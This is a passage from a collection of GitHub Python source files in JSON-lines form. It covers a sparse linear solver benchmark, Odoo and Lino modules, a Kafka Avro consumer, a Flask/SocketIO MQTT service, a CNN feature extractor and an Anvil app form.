np.ctypeslib.as_ctypes(row.ravel()),\n np.ctypeslib.as_ctypes(col.ravel()),\n nnz,\n np.ctypeslib.as_ctypes(b),\n np.ctypeslib.as_ctypes(x),\n n,\n )\n\n if err:\n raise ValueError(\"Linear system could not be solved\")\n\n return x\n\n\ndef main():\n import scipy.sparse\n\n np.random.seed(0)\n\n n = 100\n k = 20 * n\n\n i = np.random.randint(n, size=k)\n j = np.random.randint(n, size=k)\n v = np.random.rand(k)\n i_inds = np.concatenate([i, j, np.arange(n)]).astype(np.int32)\n j_inds = np.concatenate([j, i, np.arange(n)]).astype(np.int32)\n coo_values = np.concatenate([v, v, n * np.ones(n)])\n\n A = scipy.sparse.coo_matrix((coo_values, (i_inds, j_inds)), (n, n))\n A.sum_duplicates()\n\n x_true = np.random.rand(n)\n b = A.dot(x_true)\n\n solvers = [\n solve_eigen_icholt_coo,\n solve_eigen_cholesky_coo,\n ]\n\n for solver in solvers:\n x = solver(A.data, A.row, A.col, b)\n\n err = np.linalg.norm(x - x_true)\n\n print(\"norm(x - x_true) = %e \" % err)\n\n assert err < 1e-5\n\n print(\"test passed\")\n\n\nif __name__ == 
\"__main__\":\n main()\n","repo_name":"pymatting/pymatting","sub_path":"benchmarks/solve_eigen.py","file_name":"solve_eigen.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":1613,"dataset":"github-code","pt":"53"} +{"seq_id":"73722720487","text":"from lino.api import ad, _\n\n\nclass Plugin(ad.Plugin):\n verbose_name = _(\"Shopping\")\n needs_plugins = ['lino_xl.lib.contacts', 'lino_xl.lib.sales']\n menu_group = \"sales\"\n\n journal_ref = \"SLS\"\n \"\"\"The reference of the journal where shopping invoices will be created.\"\"\"\n\n def get_quicklinks(self, user):\n yield 'products.Products'\n yield 'shopping.MyCart.start_plan'\n\n def setup_main_menu(self, site, user_type, m):\n mg = self.get_menu_group()\n m = m.add_menu(mg.app_label, mg.verbose_name)\n m.add_action('shopping.MyAddresses')\n m.add_action('shopping.MyCart.start_plan')\n\n def setup_config_menu(self, site, user_type, m):\n mg = self.get_menu_group()\n m = m.add_menu(mg.app_label, mg.verbose_name)\n m.add_action('shopping.DeliveryMethods')\n\n def setup_explorer_menu(self, site, user_type, m):\n mg = self.get_menu_group()\n m = m.add_menu(mg.app_label, mg.verbose_name)\n m.add_action('shopping.AllCarts')\n m.add_action('shopping.AllAddresses')\n","repo_name":"lino-framework/xl","sub_path":"lino_xl/lib/shopping/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11065020488","text":"import os\nimport doc_cleaner\nfrom nltk import sent_tokenize\nfrom nltk import word_tokenize\nimport pickle\nimport json\n\n\nTEXT = \"section_text.txt\"\nINPUT_DIRECTORY = 'data_extraction/KB'\nOUTPUT_FILE_NAME = 'sentence_similarity/data/sentence_section_pairs.txt'\nPICKLE_FILE_NAME = 'sentence_similarity/data/sentence_section_pairs.pkl'\nJSON_FILE_NAME = 'sentence_similarity/data/sentence_section_pairs.json'\nsentences_with_section = []\nsentence_set = set()\n\ndef tokenize_section(section_text):\n cleaned_section = doc_cleaner.clean_section(section_text)\n sentences = sent_tokenize(cleaned_section)\n sentences = [s for s in sentences if len(word_tokenize(s)) >= 7 and s not in sentence_set] \n \n # Add each sentence to the sentence_set\n for sentence in sentences:\n sentence_set.add(sentence)\n print(\"sentence set size so far: \", len(sentence_set))\n \n return sentences\n\n\ndef add_sections(directory):\n\n # check if section_test.txt file exists in directory\n if os.path.isfile(os.path.join(directory, TEXT)):\n with open(os.path.join(directory, TEXT), 'r') as f:\n contents = f.read()\n\n sentences = tokenize_section(contents)\n \n # Append (sentence, section) for each sentence in sentences\n for sentence in sentences:\n section = directory.split('KB')[1]\n sentences_with_section.append((sentence, section))\n\n for file in sorted(os.scandir(directory), key=lambda f: f.name):\n if os.path.isdir(file.path):\n add_sections(file.path)\n \n return sentences_with_section\n\n\nif __name__==\"__main__\":\n \n sentence_section_pairs = add_sections(INPUT_DIRECTORY)\n #print(sentence_section_pairs[:10])\n\n # Write to pickle file\n with open(PICKLE_FILE_NAME, 'wb') as f:\n pickle.dump(sentence_section_pairs, f)\n\n\n # Write to txt file\n with open(OUTPUT_FILE_NAME, 'w') as f:\n for pair in sentence_section_pairs:\n f.write(f\"SENTENCE: {pair[0]}\\nSECTION: {pair[1]}\\n \\n\")\n\n # Write to json file\n with open(JSON_FILE_NAME, 'w', encoding='utf-8') as 
f:\n json.dump(sentence_section_pairs, f, ensure_ascii=False)\n","repo_name":"iestynmullinor/honsProject","sub_path":"data_extraction/create_sentence_token_list.py","file_name":"create_sentence_token_list.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35999639125","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nfrom setuptools import setup\n\ninstall_requires = [\n 'minion-backend',\n 'pyasn1',\n 'pyopenssl',\n 'pyasn1_modules'\n]\n\nsetup(name=\"minion-ev-plugin\",\n version=\"0.1\",\n description=\"EV SSL/TLS Plugin for Minion\",\n url=\"https://github.com/dchan/minion-ev-plugin/\",\n author=\"Mozilla\",\n author_email=\"minion@mozilla.com\",\n packages=['minion', 'minion.plugins'],\n namespace_packages=['minion', 'minion.plugins'],\n include_package_data=True,\n install_requires = install_requires)\n","repo_name":"dchanm/minion-ev-plugin","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6502990198","text":"from odoo import models, fields, api, _\nimport random\nimport string\n\n\nclass KgNextOfKin(models.Model):\n _name = 'kg.associated.parties'\n\n _inherit = ['mail.thread', 'mail.activity.mixin']\n _mail_post_access = 'read'\n _description = 'Kg Next Of Kin'\n\n name = fields.Char(string='Name', copy=False, readonly=True, index=True, default=lambda self: _('New'))\n \"\"\"mandatory fields\"\"\"\n\n set_id=fields.Char(string=\"Set ID – NK1\")\n first_name=fields.Char(string=\"First Name\")\n relationship=fields.Char(string=\"Relationship\")\n address=fields.Text(string=\"Address\")\n cell_phn_no = fields.Char(string=\"Cell Phone\")\n business_phn_no = fields.Char(string=\"Business Phone Number\")\n emergency_contact = fields.Char(string=\"Contact Role\")\n start_date = fields.Date('Start Date')\n end_date = fields.Date('End Date')\n organization_name = fields.Char(string=\"Organization Name – NK1\")\n contact_persons_name = fields.Char(string=\"Contact Person's Name\")\n contact_persons_phn_no = fields.Char(string=\"Contact Person's Telephone Number\")\n\n \"\"\"non mandatory fields\"\"\"\n\n middle_name = fields.Char(string=\"Middle Name\")\n last_name = fields.Char(string=\"last Name\")\n home_phn_no = fields.Char(string=\"Home Phone\")\n email = fields.Char(string=\"email\")\n nok_job_title = fields.Char(string=\"Next of Kin/Associated Parties Job Title\")\n nok_job_code = fields.Char(string=\"Next of Kin / Associated Parties Job Code/Class\")\n nok_job_emp_no = fields.Char(string=\"Next of Kin / Associated Parties Employee Number\")\n maritual_status = fields.Selection([('married', 'Married'), ('unmarried', 'Unmarried')], default=None,\n string=\"Marital Status\")\n administrative_sex = fields.Selection([('male', 'Male'), ('female', 'Female'), ('unknown', 'Unknown')],\n default=None,\n string=\"Administrative Sex\")\n birth_date = fields.Datetime('Date/Time of Birth')\n living_dependency = fields.Char(string=\"Living Dependency\")\n ambulatory_status = fields.Char(string=\"Ambulatory Status\")\n citizenship = fields.Char(string=\"Citizenship\")\n primary_lang = fields.Many2one('res.lang', string=\"Primary Language\")\n living_arrangement = fields.Char(string=\"Living 
Arrangement\")\n publicity_code = fields.Selection([('Family', 'F'), ('No Publicity', 'N'), ('Other,', 'O'),\n ('Unknown', 'U')],\n help=\"F for Family,N for No Publicity and O for Other,U for Unknown\",\n string=\"Publicity Code\")\n protection_indicator = fields.Selection([('Yes', '1'), ('No', '0'), ('not available,', 'None')],\n help=\"1 for Yes,0 for No and None for Not available\",\n string=\"Protection Indicator\")\n\n student_indicator = fields.Char(string=\"Student Indicator\")\n religion = fields.Char(string=\"Religion\")\n mothers_name = fields.Char(string=\"Mother's Maiden Name\")\n nationality = fields.Many2one('res.country', string='Nationality')\n ethnic_group = fields.Char(string=\"Ethnic Group\")\n contact_reason = fields.Char(string=\"Contact Reason\")\n contact_persons_addres = fields.Text(string=\"Contact Person's Address\")\n nok_identifiers= fields.Char(string=\"Next of Kin/Associated Party's Identifiers\")\n job_status= fields.Char(string=\"Job Status\")\n race= fields.Char(string=\"Race\")\n handicap = fields.Boolean(string=\"Handicap\")\n contact_persn_secrty_no = fields.Char(string=\"Contact Person Social Security Number\")\n nok_birth_place = fields.Char(string=\"Next of Kin Birth Place\")\n vip_indicator = fields.Char(string=\"VIP Indicator\")\n\n state = fields.Selection([('draft', 'Draft'),('submited','Submitted'),('cancel','Cancel')],string='Status', default='draft')\n\n\n @api.model\n def create(self, vals):\n if vals.get('name', _('New')) == _('New'): vals['name'] = self.env['ir.sequence'].next_by_code(\n 'kg.associated.parties') or _('New')\n request = super(KgNextOfKin, self).create(vals)\n return request\n\n def btn_submit(self):\n self.write({'state': 'submited'})\n url = self.env['ir.config_parameter'].get_param('web.base.url')\n data = {\n 'set_id' : self.set_id,\n 'first_name' : self.first_name,\n 'relationship' : self.relationship,\n 'address' : self.address,\n 'cell_phn_no' : self.cell_phn_no,\n 'business_phn_no' : self.business_phn_no,\n 'emergency_contact' : self.emergency_contact,\n # 'start_date' : self.start_date,\n # 'end_date' : self.end_date,\n 'organization_name' : self.organization_name,\n 'contact_persons_name' : self.contact_persons_name,\n 'contact_persons_phn_no' : self.contact_persons_phn_no,\n 'middle_name' : self.middle_name,\n 'last_name' : self.last_name,\n 'home_phn_no' : self.home_phn_no,\n 'email' : self.email,\n 'nok_job_title' : self.nok_job_title,\n 'nok_job_code' : self.nok_job_code,\n 'nok_job_emp_no' : self.nok_job_emp_no,\n 'maritual_status' : self.maritual_status,\n 'administrative_sex' : self.administrative_sex,\n # 'birth_date' : self.birth_date,\n 'living_dependency' : self.living_dependency,\n 'ambulatory_status' : self.ambulatory_status,\n 'citizenship' : self.citizenship,\n 'primary_lang' : self.primary_lang.name,\n 'living_arrangement' : self.living_arrangement,\n 'publicity_code' : self.publicity_code,\n 'protection_indicator' : self.protection_indicator,\n 'student_indicator' : self.student_indicator,\n 'religion' : self.religion,\n 'mothers_name' : self.mothers_name,\n 'nationality' : self.nationality.name,\n 'ethnic_group' : self.ethnic_group,\n 'contact_reason' : self.contact_reason,\n 'contact_persons_addres' : self.contact_persons_addres,\n 'nok_identifiers' : self.nok_identifiers,\n 'job_status' : self.job_status,\n 'race' : self.race,\n 'handicap' : self.handicap,\n 'contact_persn_secrty_no' : self.contact_persn_secrty_no,\n 'nok_birth_place' : self.nok_birth_place,\n 'vip_indicator' : 
self.vip_indicator,\n\n }\n response_data = self.env['tdcc.api'].post(data, url)\n\n\n def btn_cancel(self):\n print(\"mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm\")\n self.write({'state': 'cancel'})","repo_name":"Anaswarap/odoo_klystron","sub_path":"kg_tdcc_api/models/next_of_kin.py","file_name":"next_of_kin.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7733517248","text":"import torch\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom tqdm import tqdm\n\n\nclass Net(torch.nn.Module):\n def __init__(self, model):\n super(Net, self).__init__()\n self.model = model\n\n def save_output(module, Input, output):\n self.buffer = output\n self.model.avgpool.register_forward_hook(save_output)\n\n def forward(self, x):\n self.model(x)\n return self.buffer\n\n\nif __name__ == '__main__':\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n model = torch.load('result/CNN1/epoch_20.model')\n test_feautures = torch.load(\"CNN_Data/test_features.tov\")\n test_labels = torch.load('CNN_Data/test_labels.tov')\n test_set = TensorDataset(test_feautures, test_labels)\n bs = 64\n test_loader = DataLoader(test_set, batch_size=bs, shuffle=False)\n\n net = Net(model)\n net.eval()\n net.cuda()\n Tot_Features = []\n tot_labels = []\n for Idx, (data, labels) in enumerate(tqdm(test_loader)):\n batchlen = len(data)\n data = data.to(device)\n result = net(data)\n result = result.detach().cpu()\n result = result.reshape((batchlen, -1))\n Tot_Features.append(result)\n tot_labels.append(labels)\n\n Tot_Features = torch.cat(Tot_Features, 0)\n tot_labels = torch.cat(tot_labels, 0)\n print(Tot_Features.shape)\n torch.save(Tot_Features, 'tot_test_features.tov')\n torch.save(tot_labels, 'tot_test_labels.tov')\n","repo_name":"zengkaipeng/Machine_Learning","sub_path":"Get_CNN_Feature.py","file_name":"Get_CNN_Feature.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16399591658","text":"import argparse\nimport os\nimport uuid\nfrom typing import Dict, List\n\nfrom aiokafka import AIOKafkaConsumer, ConsumerRecord, TopicPartition, AIOKafkaProducer\nfrom confluent_kafka import Consumer\nfrom confluent_kafka.serialization import SerializationContext, MessageField, SerializationError\nfrom confluent_kafka.schema_registry import SchemaRegistryClient\nfrom confluent_kafka.schema_registry.avro import AvroDeserializer, AvroSerializer\nimport traceback as tb\nfrom confluent_kafka.serialization import StringSerializer\n\nfrom db.kafka_to_db import search_and_insert\nfrom models.person import Person, Error\nimport asyncio\n\n\n# from confluent_kafka.schema_registry.\n\n\n# class User:\n# \"\"\"\n# User record\n#\n# Args:\n# name (str): User's name\n#\n# favorite_number (int): User's favorite number\n#\n# favorite_color (str): User's favorite color\n# \"\"\"\n#\n# def __init__(self, id, first_name, middle_name, last_name, dob, address):\n# self.id = id\n# self.first_name = first_name\n# self.middle_name = middle_name\n# self.last_name = last_name\n# self.dob = dob\n# self.address = address\n\n\n# def address_to_dict(addresses: List[Address]):\n# \"\"\"\n# Returns a dict representation of a User instance for serialization.\n#\n# Args:\n# user (User): User instance.\n#\n# ctx (SerializationContext): Metadata pertaining to the serialization\n# operation.\n#\n# Returns:\n# dict: Dict populated with user 
attributes to be serialized.\n# :param addresses:\n# \"\"\"\n#\n# address_dict = [address.model_dump() for address in addresses]\n# return address_dict\n\n\n# def person_to_dict(person: Person, ctx):\n# \"\"\"\n# Returns a dict representation of a User instance for serialization.\n#\n# Args:\n# person (User): User instance.\n#\n# ctx (SerializationContext): Metadata pertaining to the serialization\n# operation.\n#\n# Returns:\n# dict: Dict populated with user attributes to be serialized.\n# \"\"\"\n# person_dict = dict(id=person.id, first_name=person.first_name, last_name=person.last_name, dob=person.dob\n# , address=address_to_dict(person.address)\n# )\n# return person_dict\n\n\ndef dict_to_user(obj, ctx):\n \"\"\"\n Converts object literal(dict) to a User instance.\n\n Args:\n obj (dict): Object literal(dict)\n\n ctx (SerializationContext): Metadata pertaining to the serialization\n operation.\n \"\"\"\n\n if obj is None:\n return None\n print(obj)\n return Person(id=obj['id'],\n first_name=obj['first_name'],\n middle_name=obj['middle_name'],\n last_name=obj['last_name'],\n dob=obj['dob'],\n address=obj['address']\n )\n\n\ndef error_to_dict(error: Error, ctx):\n \"\"\"\n Returns a dict representation of a User instance for serialization.\n\n Args:\n person (User): User instance.\n\n ctx (SerializationContext): Metadata pertaining to the serialization\n operation.\n\n Returns:\n dict: Dict populated with user attributes to be serialized.\n \"\"\"\n error_dict = dict(errorType=error.errorType, errorDesc=error.errorDesc)\n\n return error_dict\n\n\nasync def main():\n topic = \"person\"\n # is_specific = args.specific == \"true\"\n\n # schema = \"person_nested.avsc\"\n\n sr_conf = {'url': 'http://localhost:8081'}\n schema_registry_client = SchemaRegistryClient(sr_conf)\n schema_str: str = get_schema()\n error_schema: str = get_error_schema()\n avro_deserializer = AvroDeserializer(schema_registry_client,\n schema_str,\n dict_to_user)\n\n ################################ ERROR SENDING PRODUCER #############################################\n\n # id: uuid.UUID = uuid.uuid4()\n\n ################################ ERROR SENDING PRODUCER #############################################\n\n consumer_conf = {'bootstrap.servers': 'localhost:9092',\n 'group.id': 'test',\n 'auto.offset.reset': \"latest\",\n }\n\n # consumer = AIOKafkaConsumer(bootstrap_servers='localhost:9092',\n # group_id='test',\n # auto_offset_reset='earliest'\n # )\n\n # consumer = AIOKafkaConsumer(*consumer_conf,)\n consumer = AIOKafkaConsumer(bootstrap_servers=\"localhost:9092\", group_id=\"test\", auto_offset_reset=\"latest\",\n enable_auto_commit=False\n )\n\n consumer.subscribe([topic])\n await consumer.start()\n while True:\n try:\n\n # SIGINT can't be handled when polling, limit timeout to 1 second.\n messages: Dict[TopicPartition, List[ConsumerRecord]] = await consumer.getmany(timeout_ms=1500)\n print(\"polling...\")\n # print(msg.value())\n if messages is None:\n continue\n for message in messages.values():\n msg = message.pop()\n try:\n user = avro_deserializer(msg.value, SerializationContext(msg.topic, MessageField.VALUE))\n\n if user is not None:\n # print(\"User record with key {}: id : {}\\n\"\n # \"\\tfirst Name: {}\\n\"\n # \"\\tlast name: {}\\n\"\n # .format(msg.key(), user.id , user.first_name, user.last_name))\n print(\n f'{user.id} , First Name = {user.first_name}, Last Name = {user.last_name} , Address = {user.address}'\n\n )\n # search the person table by id\n await search_and_insert(user.id, user.first_name, 
user.last_name, user.dob)\n\n except SerializationError as e:\n tb.print_exc()\n errorDesc: str = ''.join(tb.format_exception(None, e, e.__traceback__))\n print(msg.value)\n print(\"Inside Serialization Exception block\")\n print(e)\n string_serializer = StringSerializer('utf_8')\n producer = AIOKafkaProducer(bootstrap_servers='localhost:9092')\n avro_serializer = AvroSerializer(schema_registry_client,\n error_schema,\n error_to_dict)\n\n error = Error(errorType=\"SerializationError\", errorDesc=errorDesc)\n await producer.start()\n\n # send to dead letter queue\n # result = await producer.send(topic=\"deadletterqueue\",\n # value=error)\n\n await producer.send(topic=\"deadletterqueue\",\n key=string_serializer(str(uuid.uuid4())),\n value=avro_serializer(error, SerializationContext(\"deadletterqueue\",\n MessageField.VALUE))\n )\n\n await producer.flush()\n # await producer.stop()\n\n await consumer.commit()\n except KeyboardInterrupt as li:\n print(li)\n except Exception as error:\n print(error)\n await consumer.commit()\n\n await consumer.stop()\n\n\ndef get_error_schema() -> str:\n # pass\n path = os.path.realpath(os.path.dirname(__file__))\n with open(f\"{path}/schema/error.avsc\") as f:\n error_schema_str = f.read()\n print(error_schema_str)\n return error_schema_str\n\n\ndef get_schema() -> str:\n \"\"\"\n search for the latest schema\n\n :return: schema str\n \"\"\"\n schema_registry_conf = {'url': \"http://localhost:8081\"}\n sr = SchemaRegistryClient(schema_registry_conf)\n return sr.get_latest_version(subject_name='person-value').schema.schema_str\n\n\nif __name__ == '__main__':\n # parser = argparse.ArgumentParser(description=\"AvroDeserializer example\")\n # parser0.add_argument('-b', dest=\"bootstrap_servers\", required=True,\n # help=\"Bootstrap broker(s) (host[:port])\")\n # parser.add_argument('-s', dest=\"schema_registry\", required=True,\n # help=\"Schema Registry (http(s)://host[:port]\")\n # parser.add_argument('-t', dest=\"topic\", default=\"example_serde_avro\",\n # help=\"Topic name\")\n # parser.add_argument('-g', dest=\"group\", default=\"example_serde_avro\",\n # help=\"Consumer group\")\n # parser.add_argument('-p', dest=\"specific\", default=\"true\",\n # help=\"Avro specific record\")\n\n try:\n # result = loop.run_until_complete(main())\n # loop = asyncio.get_event_loop()\n # io.run(main())\n # consumer_task = loop.create_task(main())\n # loop.run_until_complete(main())\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n\n\n except KeyboardInterrupt as k:\n print(\"Hello World inside Keyboard Exception \")\n except Exception as e:\n print(\"Closing\")\n print(e)\n","repo_name":"deepakddun/kafka-project","sub_path":"kafka_proj/aio_kafka_consumer.py","file_name":"aio_kafka_consumer.py","file_ext":"py","file_size_in_byte":9461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20509518915","text":"#!/usr/bin/env python\nimport os\nimport rospy\nimport numpy as np\nimport csv\n\nclass CSVLogger(object):\n '''\n CSV Data Logger\n '''\n def __init__(self, filename, results_dir):\n self.log_filename = rospy.get_param('~log_filename', filename)\n self.results_dir = results_dir\n\n def write_to_file(self, data, new_file=False):\n if os.path.isdir(self.results_dir):\n if not new_file:\n mode = 'a'\n else:\n mode = 'w'\n with open(os.path.join(self.results_dir, self.log_filename), mode) as fd:\n writer = csv.writer(fd)\n writer.writerow(data)\n fd.close()\n else:\n print(self.results_dir)\n 
rospy.logwarn(\"[CSV_LOGGER] log file path error\")\n","repo_name":"AbLECPS/alc","sub_path":"bluerov2_standalone/catkin_ws/src/vandy_bluerov/nodes/csv_logger.py","file_name":"csv_logger.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35955856729","text":"from flask import Flask, request\nfrom config import Configuration\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_security import SQLAlchemyUserDatastore\nfrom flask_security import Security\nfrom flask_marshmallow import Marshmallow\nfrom apispec import APISpec\nfrom flask_bcrypt import Bcrypt\nfrom datetime import datetime, timezone\n\nfrom threading import Lock\n\nfrom flask_apispec import FlaskApiSpec\nfrom apispec_webframeworks.flask import FlaskPlugin\nfrom apispec.ext.marshmallow import MarshmallowPlugin\n\nfrom flask_script import Manager\nfrom flask_migrate import Migrate\nfrom flask_socketio import SocketIO\n\nfrom socketio import *\nimport dbm\n\nimport paho.mqtt.client as paho\nimport threading\nimport time\nimport json\n\nclients = []\n\nthread = None\nthread_lock = Lock()\n\ndef background_thread():\n \"\"\"Example of how to send server generated events to clients.\"\"\"\n count = 0\n while True:\n socketio.sleep(10)\n count += 1\n socketio.emit('my_response',\n {'data': 'Server generated event', 'count': count})\n\n\nDB_URL = 'postgresql://{user}:{pw}@{url}/{db}'.format(user=Configuration.POSTGRES_USER,pw=Configuration.POSTGRES_PW,url=Configuration.POSTGRES_URL,db=Configuration.POSTGRES_DB)\n\n\napp = Flask(__name__) \napp.secret_key = Configuration.SEKRET_KEY\napp.config['SQLALCHEMY_DATABASE_URI'] = DB_URL\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False \napp.config['UPLOAD_FOLDER'] = Configuration.UPLOAD_FOLDER\napp.config['UPLOAD_FOLDER'] = Configuration.ALLOWED_EXTENSIONS\napp.config.from_object(Configuration)\n\n\ndb = SQLAlchemy(app)\n\nmigrate = Migrate(app, db)\nmanager = Manager(app)\n\nma = Marshmallow(app)\nbcrypt = Bcrypt(app)\n\nasync_mode = \"threading\"\n\nsocketio = SocketIO(app, async_mode=async_mode)\n\n\nfrom models import *\nfrom schemas import *\n\nwatchingMarks = None\n\napp.config.update({\n 'APISPEC_SPEC': APISpec(\n title='bfg-database-api',\n version='v1',\n openapi_version='2.0.0',\n plugins=[MarshmallowPlugin()],\n ),\n 'APISPEC_SWAGGER_URL': '/swagger/'\n})\n\ndocs = FlaskApiSpec(app)\n\n#db.drop_all()\ndb.create_all()\ndb.session.commit()\n\nroles = UserRolesDB.query.all()\nfor role in roles:\n for table in editableTables:\n query = UserPermissionsDB.query.all()\n permissions = UserPermissionsDB.query.filter_by(table = table[0], role = role.role).all()\n if(len(permissions) == 0):\n item = UserPermissionsDB(\n table = table[0], \n role = role.role,\n get = False,\n put = False,\n delete = False,\n )\n db.session.add(item)\n db.session.commit() \n\nusers = UsersDB.query.filter_by(role = 'administrator').all()\nif(len(users) == 0):\n pass_hash = bcrypt.generate_password_hash('pass', 10) \n pass_hash_decoded = pass_hash.decode('utf-8') \n admin = UsersDB(\n login = 'root',\n username = 'administrator',\n password_hash = pass_hash_decoded,\n role = 'administrator')\n db.session.add(admin)\n db.session.commit() \n\n## -------------------------------------------------------------------------\n## -------------------------------------------------------------------------\n## -------------------------------------------------------------------------\n\nclass Mark_dict(object):\n\n def 
__init__(self):\n self.mark_storage = {}\n\n self.client = paho.Client(\"pahoMQTTClient\") \n self.broker = \"localhost\"\n self.port = 1883\n self.client.on_message = self.on_message\n self.client.connect(self.broker, self.port)\n\n def append(self, name, val):\n res = self.mark_storage.get(name)\n if res is None:\n self.mark_storage[name] = [val]\n ## create thread \n self.client.subscribe(name) \n #print(\"subscribe\", name) \n else:\n self.mark_storage[name].append(val)\n \n def delete(self, name, val):\n res = self.mark_storage.get(name)\n if res is not None:\n if (len(res) == 1):\n del self.mark_storage[name] \n ## delete thread \n self.client.unsubscribe(name) \n #print(\"unsubscribe\", name) \n else:\n try:\n self.mark_storage[name].remove(val)\n except ValueError:\n return False\n\n def delete_by_client_id(self, id):\n for key, val in self.mark_storage.copy().items():\n while id in val: val.remove(id)\n if (len(val) == 0):\n del self.mark_storage[key] \n ## delete thread \n self.client.unsubscribe(key) \n #print(\"unsubscribe\", key)\n\n def on_message(self, client, userdata, message):\n mes = str(message.payload.decode(\"utf-8\")) \n mes = json.loads(mes)\n mes[\"mark_id\"] = message.topic\n res = self.mark_storage.get(message.topic)\n if res is not None:\n for n in self.mark_storage[message.topic]:\n #print ('send: ', mes, ' to client: ', n) \n socketio.emit('on_message', mes, room = n)\n\n\ndef background_thread():\n global watchingMarks\n watchingMarks = Mark_dict() \n watchingMarks.client.loop_forever() \n\nthread = socketio.start_background_task(background_thread)\n\n@socketio.on('disconnect')\ndef disconnected():\n print('Client disconnected', request.sid)\n clients.remove(request.sid)\n watchingMarks.delete_by_client_id(request.sid) \n print('stopMarkWatching', request.sid)\n \n@socketio.event\ndef connect():\n print('Client connected!!', request.sid)\n clients.append(request.sid)\n\n@socketio.event\ndef addWatchingMark(mark_id):\n watchingMarks.append(mark_id['data'], request.sid) \n print('addWatchingMark', mark_id, request.sid)\n\n@socketio.event\ndef stopMarkWatching():\n watchingMarks.delete_by_client_id(request.sid) \n print('stopMarkWatching', request.sid)\n\n@socketio.event\ndef handle_my_custom_event(json):\n print('received json: ' + str(json))\n\n","repo_name":"bfgdatabase/site","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41729548991","text":"from ._anvil_designer import VideoSalesLetterTemplate\nfrom anvil import *\nimport time\nimport json\nimport anvil.server\nimport anvil.facebook.auth\nimport anvil.google.auth, anvil.google.drive\nfrom anvil.google.drive import app_files\nimport anvil.users\nimport anvil.tables as tables\nimport anvil.tables.query as q\nfrom anvil.tables import app_tables\nfrom anvil import tables\n\nfrom ..FinalProduct import FinalProduct\n############################################################################################################\n# LOADING\nclass VideoSalesLetter(VideoSalesLetterTemplate):\n def __init__(self, **properties):\n anvil.users.login_with_form()\n\n # Call the parent class's __init__ method\n super().__init__(**properties)\n # Initialize task_id attribute\n self.task_id = None\n # Initialize counter\n self.counter = 0\n self.indeterminate_progress_vsl.visible = False\n self.indeterminate_progress_vsl_themes.visible = False\n 
self.nav_button_vsl_to_final_product.enabled = True\n\n self.chosen_company_name = None\n self.chosen_product_name = None\n self.chosen_product_research = None\n self.chosen_avatar = None\n self.chosen_tone = None\n self.chosen_final_headline = None\n self.chosen_final_subheadline = None\n self.chosen_final_secondary_headline = None\n\n # Load stuff\n current_user = anvil.users.get_user()\n user_table_name = current_user['user_id']\n # Get the table for the current user\n user_table = getattr(app_tables, user_table_name)\n\n # COMPANY NAME\n chosen_company_name_row = user_table.search(variable='chosen_company_name')[0]\n self.chosen_company_name = chosen_company_name_row['variable_value']\n\n # COMPANY PROFILE\n chosen_company_profile_row = user_table.search(variable='chosen_company_profile')[0]\n self.chosen_company_profile = chosen_company_profile_row['variable_value']\n \n # PRODUCT NAME\n chosen_product_name_row = user_table.search(variable='chosen_product_name')[0]\n self.chosen_product_name = chosen_product_name_row['variable_value']\n\n # PRODUCT PROFILE\n chosen_product_research_row = user_table.search(variable='chosen_product_research')[0]\n self.chosen_product_research = chosen_product_research_row['variable_value']\n\n # AVATARS\n chosen_avatar_row = user_table.search(variable='chosen_avatar')[0]\n self.chosen_avatar = chosen_avatar_row['variable_value']\n\n # BRAND TONE\n chosen_tone_row = user_table.search(variable='chosen_tone')[0]\n self.chosen_tone = chosen_tone_row['variable_value']\n\n # SCRIPT FORMAT\n chosen_script_row = user_table.search(variable='chosen_script')[0]\n self.chosen_script = chosen_script_row['variable_value']\n\n # FINAL HEADLINE\n chosen_final_headline_row = user_table.search(variable='chosen_final_headline')[0]\n self.chosen_final_headline = chosen_final_headline_row['variable_value']\n\n # FINAL SUBHEADLINE\n chosen_final_subheadline_row = user_table.search(variable='chosen_final_subheadline')[0]\n self.chosen_final_subheadline = chosen_final_subheadline_row['variable_value']\n\n # FINAL SECONDARY HEADLINE\n chosen_final_secondary_headline_row = user_table.search(variable='chosen_final_secondary_headline')[0]\n self.chosen_final_secondary_headline = chosen_final_secondary_headline_row['variable_value']\n \n\n # Call set_saved_values to store the retrieved values in class-level variables\n self.set_saved_values(\n self.chosen_company_name,\n self.chosen_company_profile,\n self.chosen_product_name,\n self.chosen_product_research,\n self.chosen_tone,\n self.chosen_avatar,\n self.chosen_script,\n self.chosen_final_headline,\n self.chosen_final_subheadline,\n self.chosen_final_secondary_headline\n )\n\n def set_saved_values(self, chosen_company_name, chosen_company_profile, chosen_product_name, chosen_product_research, chosen_tone, chosen_avatar, chosen_script, chosen_final_headline, chosen_final_subheadline,chosen_final_secondary_headline):\n self.chosen_company_name = chosen_company_name\n self.chosen_company_profile = chosen_company_profile\n self.chosen_product_name = chosen_product_name\n 